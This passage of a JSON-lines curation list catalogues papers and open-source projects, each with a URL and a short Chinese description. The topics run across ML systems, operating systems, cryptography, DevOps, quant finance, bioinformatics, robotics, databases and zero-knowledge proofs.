演化"},"url":"https://arxiv.org/abs/2403.02310","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"torchtitan-2024","area":"projects","topic":"ml-systems","title":"torchtitan","meta":{"col3":"2024","col4":"PyTorch 官方 LLM 训练参考库;FSDP2 + tensor parallel + pipeline 一体化"},"url":"https://github.com/pytorch/torchtitan","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"xformers","area":"projects","topic":"ml-systems","title":"xFormers","meta":{"col3":"2024","col4":"Meta;可组合 transformer 组件 + memory_efficient_attention"},"url":"https://github.com/facebookresearch/xformers","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"flashinfer-project","area":"projects","topic":"ml-systems","title":"flashinfer","meta":{"col3":"2024","col4":"FlashInfer 开源实现;vLLM/SGLang/TensorRT-LLM 共用 kernel"},"url":"https://github.com/flashinfer-ai/flashinfer","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"openrlhf","area":"projects","topic":"ml-systems","title":"OpenRLHF","meta":{"col3":"2024","col4":"Ray + DeepSpeed + vLLM 的 RLHF 训练框架;理解 PPO/DPO 系统拼装"},"url":"https://github.com/OpenRLHF/OpenRLHF","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"verl-volcengine","area":"projects","topic":"ml-systems","title":"verl: Volcano Engine RL for LLMs","meta":{"col3":"2024","col4":"字节;HybridFlow 论文的开源实现,RLHF 系统工程"},"url":"https://github.com/volcengine/verl","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"lottery-scheduling-1994","area":"papers","topic":"operating-systems","title":"Lottery Scheduling: Flexible Proportional-Share Resource Management","meta":{"col3":"1994","col4":"Waldspurger/Weihl OSDI'94;Linux CFS 的概念前身"},"url":"https://www.usenix.org/legacy/publications/library/proceedings/osdi/full_papers/waldspurger.pdf","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"anticipatory-scheduler-2001","area":"papers","topic":"operating-systems","title":"Anticipatory Scheduling: A Disk Scheduling Framework","meta":{"col3":"2001","col4":"Iyer/Druschel SOSP'01;理解 Linux I/O 调度器历史"},"url":"https://www.cs.rice.edu/~druschel/publications/anticipatory.pdf","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"epoch-based-reclamation-2007","area":"papers","topic":"operating-systems","title":"Practical Lock-Freedom: Epoch-based Reclamation","meta":{"col3":"2007","col4":"Fraser/Harris;Hazard Pointer 的替代方案,crossbeam-epoch 基础"},"url":"https://www.cl.cam.ac.uk/research/srg/netos/papers/2007-cpwl.pdf","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"seastar-shared-nothing-2014","area":"papers","topic":"operating-systems","title":"Seastar: Shared-Nothing Asynchronous Framework","meta":{"col3":"2014","col4":"ScyllaDB;per-core thread + futures,DPDK 风格内核绕过"},"url":"https://seastar.io/shared-nothing/","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"k42-research-os-2006","area":"papers","topic":"operating-systems","title":"K42: Building a Complete Operating System","meta":{"col3":"2006","col4":"IBM;面向多核可扩展的研究 OS,对象模型 + hot-swap"},"url":"https://dl.acm.org/doi/10.1145/1218063.1217949","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"snmalloc-2019","area":"papers","topic":"operating-systems","title":"snmalloc: A Message Passing Allocator","meta":{"col3":"2019","col4":"微软;线程消息传递回收,跨线程 free 不阻塞"},"url":"https://github.com/microsoft/snmalloc/blob/main/snmalloc.pdf","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"dpdk-project","area":"projects","topic":"operating-systems","title":"DPDK","meta":{"col3":"2024","col4":"Intel;用户态网络栈/轮询模式,云厂商高性能网关基础"},"url":"https://www.dpdk.org/","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"spdk-project","area":"projects","topic":"operating-systems","title":"SPDK","meta":{"col3":"2024","col4":"Intel;用户态 NVMe 存储栈,DPDK 的存储版"},"url":"https://spdk.io/","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"rust-for-linux","area":"projects","topic":"operating-systems","title":"Rust for Linux","meta":{"col3":"2024","col4":"Linux 6.x 起官方支持,理解内核语言策略"},"url":"https://github.com/Rust-for-Linux/linux","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"aya-rs-ebpf","area":"projects","topic":"operating-systems","title":"aya: Rust eBPF library","meta":{"col3":"2024","col4":"纯 Rust eBPF 框架;理解新一代 eBPF 工具链"},"url":"https://github.com/aya-rs/aya","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"aes-gcm-2003","area":"papers","topic":"security-privacy","title":"The Galois/Counter Mode of Operation (GCM)","meta":{"col3":"2003","col4":"McGrew/Viega;AES-GCM 的 NIST 草案,TLS 1.3 主流模式"},"url":"https://csrc.nist.gov/csrc/media/projects/block-cipher-techniques/documents/bcm/proposed-modes/gcm/gcm-spec.pdf","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"hkdf-rfc5869","area":"papers","topic":"security-privacy","title":"HKDF: HMAC-based Extract-and-Expand Key Derivation Function","meta":{"col3":"2010","col4":"Krawczyk RFC 5869;TLS/Noise 共用的密钥派生标准"},"url":"https://www.rfc-editor.org/rfc/rfc5869","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"ed25519-2011","area":"papers","topic":"security-privacy","title":"High-speed High-security Signatures (Ed25519)","meta":{"col3":"2011","col4":"Bernstein 等;现代签名标准,age/SSH/SecureScuttlebutt 用"},"url":"https://ed25519.cr.yp.to/ed25519-20110926.pdf","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"argon2-2015","area":"papers","topic":"security-privacy","title":"Argon2: The Memory-Hard Function for Password Hashing","meta":{"col3":"2015","col4":"PHC 获胜算法;现代 KDF/密码哈希"},"url":"https://password-hashing.net/argon2-specs.pdf","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"noise-explorer-2018","area":"papers","topic":"security-privacy","title":"Noise Explorer: Fully Automated Modeling of Noise Protocol","meta":{"col3":"2018","col4":"Kobeissi;理解 WireGuard/Wickr 的协议族"},"url":"https://noiseexplorer.com/","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"trivy-aquasec","area":"projects","topic":"security-privacy","title":"Trivy","meta":{"col3":"2024","col4":"Aqua Security;最广用的容器/IaC/SBOM 漏洞扫描器"},"url":"https://github.com/aquasecurity/trivy","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"semgrep-r2c","area":"projects","topic":"security-privacy","title":"Semgrep","meta":{"col3":"2024","col4":"r2c;轻量静态分析 SAST,规则即代码"},"url":"https://github.com/semgrep/semgrep","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"step-ca-smallstep","area":"projects","topic":"security-privacy","title":"step-ca","meta":{"col3":"2024","col4":"Smallstep;私有 CA 自托管 + ACME,零信任部署"},"url":"https://github.com/smallstep/certificates","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"teleport-gravitational","area":"projects","topic":"security-privacy","title":"Teleport","meta":{"col3":"2024","col4":"Gravitational;统一 SSH/K8s/DB 接入控制,零信任审计"},"url":"https://github.com/gravitational/teleport","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"salsa-incremental-2019","area":"papers","topic":"editors-ide","title":"Salsa: An Incremental Computation Framework","meta":{"col3":"2019","col4":"rust-analyzer 核心;Adapton 的工程化版本"},"url":"https://github.com/salsa-rs/salsa/blob/master/book/src/about_salsa.md","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"dap-spec","area":"papers","topic":"editors-ide","title":"Debug Adapter Protocol Specification","meta":{"col3":"2018","col4":"微软;与 LSP 并列的调试通用协议"},"url":"https://microsoft.github.io/debug-adapter-protocol/specification","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"lapce-editor","area":"projects","topic":"editors-ide","title":"Lapce","meta":{"col3":"2024","col4":"Rust + Druid;融合 Vim/VSCode 的现代编辑器"},"url":"https://github.com/lapce/lapce","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"nvim-treesitter","area":"projects","topic":"editors-ide","title":"nvim-treesitter","meta":{"col3":"2024","col4":"Neovim 的 tree-sitter 集成;现代语法高亮事实标准"},"url":"https://github.com/nvim-treesitter/nvim-treesitter","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"cody-sourcegraph","area":"projects","topic":"editors-ide","title":"Cody","meta":{"col3":"2024","col4":"Sourcegraph;代码搜索 + LLM agent,企业级 AI 编辑器"},"url":"https://github.com/sourcegraph/cody","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"kakoune-editor","area":"projects","topic":"editors-ide","title":"Kakoune","meta":{"col3":"2024","col4":"选择优先模态编辑器;Helix 的灵感来源"},"url":"https://github.com/mawww/kakoune","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"emacs-magit","area":"projects","topic":"editors-ide","title":"Magit","meta":{"col3":"2024","col4":"Emacs git porcelain;最被效仿的 Git UI"},"url":"https://github.com/magit/magit","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"warp-terminal","area":"projects","topic":"editors-ide","title":"Warp Terminal","meta":{"col3":"2024","col4":"Rust + GPU 渲染终端;blocks/AI 命令补全"},"url":"https://github.com/warpdotdev/Warp","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"chaos-engineering-netflix-2016","area":"papers","topic":"business-engineering","title":"Chaos Engineering: Netflix's Approach","meta":{"col3":"2016","col4":"Basiri 等 IEEE Software;故障注入工程化的奠基"},"url":"https://arxiv.org/abs/1702.05843","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"dora-state-of-devops-2023","area":"papers","topic":"business-engineering","title":"DORA State of DevOps Report 2023","meta":{"col3":"2023","col4":"Google DORA;四大指标 + 平台工程的最新基准"},"url":"https://services.google.com/fh/files/misc/2023_state_of_devops_report.pdf","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"incident-command-system-2022","area":"papers","topic":"business-engineering","title":"Incident Command System for Tech Operations","meta":{"col3":"2022","col4":"PagerDuty/Google SRE 摘录;事件响应组织模式"},"url":"https://response.pagerduty.com/training/incident_commander/","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"backstage-spotify-2020","area":"papers","topic":"business-engineering","title":"Backstage: Spotify's Internal Developer Portal","meta":{"col3":"2020","col4":"Spotify;平台工程 IDP 概念落地的代表"},"url":"https://backstage.io/blog/2020/03/16/announcing-backstage/","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"argo-cd","area":"projects","topic":"business-engineering","title":"Argo CD","meta":{"col3":"2024","col4":"GitOps 事实标准;K8s 声明式部署"},"url":"https://github.com/argoproj/argo-cd","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"flux-cd","area":"projects","topic":"business-engineering","title":"Flux CD","meta":{"col3":"2024","col4":"Argo CD 之外的另一 GitOps 主流方案"},"url":"https://github.com/fluxcd/flux2","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"kratos-ory","area":"projects","topic":"business-engineering","title":"Ory Kratos","meta":{"col3":"2024","col4":"云原生身份基础设施;OAuth/OIDC 自托管"},"url":"https://github.com/ory/kratos","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"crossplane","area":"projects","topic":"business-engineering","title":"Crossplane","meta":{"col3":"2024","col4":"K8s 风格的多云控制面;Terraform 的声明式替代"},"url":"https://github.com/crossplane/crossplane","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"kelly-criterion-1956","area":"papers","topic":"quant-finance","title":"A New Interpretation of Information Rate (Kelly Criterion)","meta":{"col3":"1956","col4":"Kelly;最优下注比例的奠基,量化仓位管理基石"},"url":"https://www.princeton.edu/~wbialek/rome/refs/kelly_56.pdf","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"black-scholes-1973","area":"papers","topic":"quant-finance","title":"The Pricing of Options and Corporate Liabilities","meta":{"col3":"1973","col4":"Black/Scholes;期权定价模型奠基论文,金融工程必读"},"url":"https://www.cs.princeton.edu/courses/archive/fall09/cos323/papers/black_scholes73.pdf","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"almgren-chriss-2001","area":"papers","topic":"quant-finance","title":"Optimal Execution of Portfolio Transactions","meta":{"col3":"2001","col4":"Almgren/Chriss;最优执行算法的奠基,VWAP/TWAP 后续都基于此"},"url":"https://www.smallake.kr/wp-content/uploads/2016/03/optliq.pdf","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"lopez-de-prado-trio-2018","area":"papers","topic":"quant-finance","title":"The 10 Reasons Most Machine Learning Funds Fail","meta":{"col3":"2018","col4":"López de Prado JPM;ML 用于金融的工程坑全记录"},"url":"https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3104816","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"nautilus-trader","area":"projects","topic":"quant-finance","title":"Nautilus Trader","meta":{"col3":"2024","col4":"高性能 Rust 量化回测/实盘平台,事件驱动"},"url":"https://github.com/nautechsystems/nautilus_trader","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"qlib-microsoft","area":"projects","topic":"quant-finance","title":"Qlib","meta":{"col3":"2024","col4":"微软亚研;AI 驱动的量化研究平台,A 股因子库"},"url":"https://github.com/microsoft/qlib","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"freqtrade","area":"projects","topic":"quant-finance","title":"Freqtrade","meta":{"col3":"2024","col4":"开源加密货币量化交易机器人,最广用"},"url":"https://github.com/freqtrade/freqtrade","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"hummingbot","area":"projects","topic":"quant-finance","title":"Hummingbot","meta":{"col3":"2024","col4":"做市商和 DEX 量化机器人开源框架"},"url":"https://github.com/hummingbot/hummingbot","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"vectorbt","area":"projects","topic":"quant-finance","title":"vectorbt","meta":{"col3":"2024","col4":"向量化回测 Python 库;NumPy 极致性能策略评估"},"url":"https://github.com/polakowo/vectorbt","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"awesome-systematic-trading","area":"projects","topic":"quant-finance","title":"awesome-systematic-trading","meta":{"col3":"2024","col4":"量化资源 awesome list;策略 + 数据 + 平台"},"url":"https://github.com/edarchimbaud/awesome-systematic-trading","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"blast-altschul-1990","area":"papers","topic":"bioinformatics","title":"Basic Local Alignment Search Tool (BLAST)","meta":{"col3":"1990","col4":"Altschul 等;序列比对工具的奠基,最被引用论文之一"},"url":"https://www.sciencedirect.com/science/article/abs/pii/S0022283605803602","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"smith-waterman-1981","area":"papers","topic":"bioinformatics","title":"Identification of Common Molecular Subsequences","meta":{"col3":"1981","col4":"Smith/Waterman;局部序列比对动态规划算法"},"url":"https://en.wikipedia.org/wiki/Smith%E2%80%93Waterman_algorithm","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"rosettafold-2021","area":"papers","topic":"bioinformatics","title":"Accurate Prediction of Protein Structures and Interactions (RoseTTAFold)","meta":{"col3":"2021","col4":"Baek 等 Science;AlphaFold2 同期独立工作"},"url":"https://www.science.org/doi/10.1126/science.abj8754","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"esmfold-2022","area":"papers","topic":"bioinformatics","title":"Evolutionary-Scale Prediction of Atomic-Level Protein Structure","meta":{"col3":"2022","col4":"Meta ESMFold;语言模型从单序列预测结构"},"url":"https://www.science.org/doi/10.1126/science.ade2574","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"biopython","area":"projects","topic":"bioinformatics","title":"Biopython","meta":{"col3":"2024","col4":"Python 生信事实标准库;Seq/Bio.PDB/Bio.Blast"},"url":"https://github.com/biopython/biopython","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"samtools-htslib","area":"projects","topic":"bioinformatics","title":"samtools / htslib","meta":{"col3":"2024","col4":"BAM/CRAM 格式标准实现;测序数据处理基石"},"url":"https://github.com/samtools/samtools","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"snakemake","area":"projects","topic":"bioinformatics","title":"Snakemake","meta":{"col3":"2024","col4":"Python DSL 的工作流管理;最广用生信 pipeline 工具"},"url":"https://github.com/snakemake/snakemake","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"nextflow","area":"projects","topic":"bioinformatics","title":"Nextflow","meta":{"col3":"2024","col4":"DSL2;Snakemake 的竞争方案,nf-core 社区强大"},"url":"https://github.com/nextflow-io/nextflow","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"scanpy","area":"projects","topic":"bioinformatics","title":"Scanpy","meta":{"col3":"2024","col4":"Python 单细胞分析;Seurat 的 Python 对手"},"url":"https://github.com/scverse/scanpy","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"rdkit","area":"projects","topic":"bioinformatics","title":"RDKit","meta":{"col3":"2024","col4":"开源化学信息学库;分子指纹/SMILES/RDKit 是化学 AI 基础"},"url":"https://github.com/rdkit/rdkit","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"rt-1-2022","area":"papers","topic":"robotics-VLA","title":"RT-1: Robotics Transformer for Real-World Control at Scale","meta":{"col3":"2022","col4":"Google;机器人 transformer 的奠基,VLA 范式起点"},"url":"https://arxiv.org/abs/2212.06817","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"rt-2-2023","area":"papers","topic":"robotics-VLA","title":"RT-2: Vision-Language-Action Models","meta":{"col3":"2023","col4":"Google DeepMind;VLM 直接输出动作 token,VLA 概念诞生"},"url":"https://arxiv.org/abs/2307.15818","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"openvla-2024","area":"papers","topic":"robotics-VLA","title":"OpenVLA: An Open-Source Vision-Language-Action Model","meta":{"col3":"2024","col4":"Stanford;首个开源 7B VLA,社区基线"},"url":"https://arxiv.org/abs/2406.09246","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"octo-2024","area":"papers","topic":"robotics-VLA","title":"Octo: An Open-Source Generalist Robot Policy","meta":{"col3":"2024","col4":"BAIR;diffusion policy + transformer 的通用机器人"},"url":"https://arxiv.org/abs/2405.12213","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"rt-x-2023","area":"papers","topic":"robotics-VLA","title":"Open X-Embodiment: Robotic Learning Datasets and RT-X Models","meta":{"col3":"2023","col4":"21 实验室联合;跨实体数据集合作的里程碑"},"url":"https://arxiv.org/abs/2310.08864","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"pi0-physical-intelligence-2024","area":"papers","topic":"robotics-VLA","title":"π0: A Vision-Language-Action Flow Model for General Robot Control","meta":{"col3":"2024","col4":"Physical Intelligence;flow matching + VLA,性能 SOTA"},"url":"https://arxiv.org/abs/2410.24164","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"lerobot","area":"projects","topic":"robotics-VLA","title":"LeRobot","meta":{"col3":"2024","col4":"HuggingFace;机器人版 transformers,VLA 训练/部署事实标准"},"url":"https://github.com/huggingface/lerobot","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"isaac-lab-nvidia","area":"projects","topic":"robotics-VLA","title":"Isaac Lab","meta":{"col3":"2024","col4":"NVIDIA;Isaac Sim 上的机器人学习框架,GPU 并行仿真"},"url":"https://github.com/isaac-sim/IsaacLab","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"mujoco-deepmind","area":"projects","topic":"robotics-VLA","title":"MuJoCo","meta":{"col3":"2024","col4":"DeepMind 开源后;机器人物理仿真事实标准"},"url":"https://github.com/google-deepmind/mujoco","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"awesome-robotics-fm","area":"projects","topic":"robotics-VLA","title":"awesome-robotics-foundation-models","meta":{"col3":"2024","col4":"VLA/RT-X/世界模型资源汇总"},"url":"https://github.com/JeffreyYH/Awesome-Generalist-Robots-via-Foundation-Models","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"photon-databricks-2022","area":"papers","topic":"database-modern","title":"Photon: A Fast Query Engine for Lakehouse Systems","meta":{"col3":"2022","col4":"Databricks SIGMOD'22;C++ 向量化引擎,lakehouse 商业代表"},"url":"https://people.eecs.berkeley.edu/~matei/papers/2022/sigmod_photon.pdf","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"umbra-2020","area":"papers","topic":"database-modern","title":"Umbra: A Disk-Based System with In-Memory Performance","meta":{"col3":"2020","col4":"Neumann TUM;HyPer 的继任者,编译执行 + 列存"},"url":"https://www.cidrdb.org/cidr2020/papers/p29-neumann-cidr20.pdf","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"iceberg-2020","area":"papers","topic":"database-modern","title":"Apache Iceberg: A High-Performance Table Format","meta":{"col3":"2020","col4":"Netflix;现代 lakehouse 的事实表格式标准"},"url":"https://iceberg.apache.org/spec/","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"delta-lake-2020","area":"papers","topic":"database-modern","title":"Delta Lake: High-Performance ACID Table Storage over Cloud Object Stores","meta":{"col3":"2020","col4":"Databricks VLDB'20;lakehouse 事务层奠基"},"url":"https://www.vldb.org/pvldb/vol13/p3411-armbrust.pdf","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"hudi-uber-2017","area":"papers","topic":"database-modern","title":"Apache Hudi: Incremental Processing on Big Data","meta":{"col3":"2017","col4":"Uber;和 Iceberg/Delta 三足鼎立的表格式"},"url":"https://hudi.apache.org/docs/concepts","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"datafusion-arrow","area":"projects","topic":"database-modern","title":"Apache DataFusion","meta":{"col3":"2024","col4":"Rust 写的查询引擎;Arrow 生态核心,被 InfluxDB/Ballista 用"},"url":"https://github.com/apache/datafusion","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"lance-format","area":"projects","topic":"database-modern","title":"Lance","meta":{"col3":"2024","col4":"Eto;列存 + 向量索引一体化,AI 时代的 parquet"},"url":"https://github.com/lancedb/lance","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"materialize-streaming","area":"projects","topic":"database-modern","title":"Materialize","meta":{"col3":"2024","col4":"增量计算物化视图;Differential Dataflow 商业化"},"url":"https://github.com/MaterializeInc/materialize","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"paimon-flink","area":"projects","topic":"database-modern","title":"Apache Paimon","meta":{"col3":"2024","col4":"原 Flink Table Store;流批一体的表格式"},"url":"https://github.com/apache/paimon","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"questdb-tsdb","area":"projects","topic":"database-modern","title":"QuestDB","meta":{"col3":"2024","col4":"Java/C++ 时序数据库;高性能金融时间序列"},"url":"https://github.com/questdb/questdb","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"nova-folding-2021","area":"papers","topic":"cryptography-ZK","title":"Nova: Recursive Zero-Knowledge Arguments from Folding Schemes","meta":{"col3":"2021","col4":"Kothapalli/Setty/Tzialla;folding 范式奠基,zkVM 加速核心"},"url":"https://eprint.iacr.org/2021/370","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"halo2-2022","area":"papers","topic":"cryptography-ZK","title":"Halo2: A SNARK Implementation Using PLONK Arithmetization","meta":{"col3":"2022","col4":"Zcash/Electric Coin;无可信 setup 的 PLONK 实现"},"url":"https://zcash.github.io/halo2/","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"hyperplonk-2022","area":"papers","topic":"cryptography-ZK","title":"HyperPlonk: PLONK with Linear-time Prover and High-degree Custom Gates","meta":{"col3":"2022","col4":"Chen/Bunz/Boneh;PLONK 系列性能突破"},"url":"https://eprint.iacr.org/2022/1355","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} -{"slug":"plookup-2020","area":"papers","topic":"cryptography-ZK","title":"plookup: A Simplified Polynomial Protocol for Lookup Tables","meta":{"col3":"2020","col4":"Gabizon/Williamson;查找表参数化的奠基,所有现代 zkVM 用"},"url":"https://eprint.iacr.org/2020/315","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} 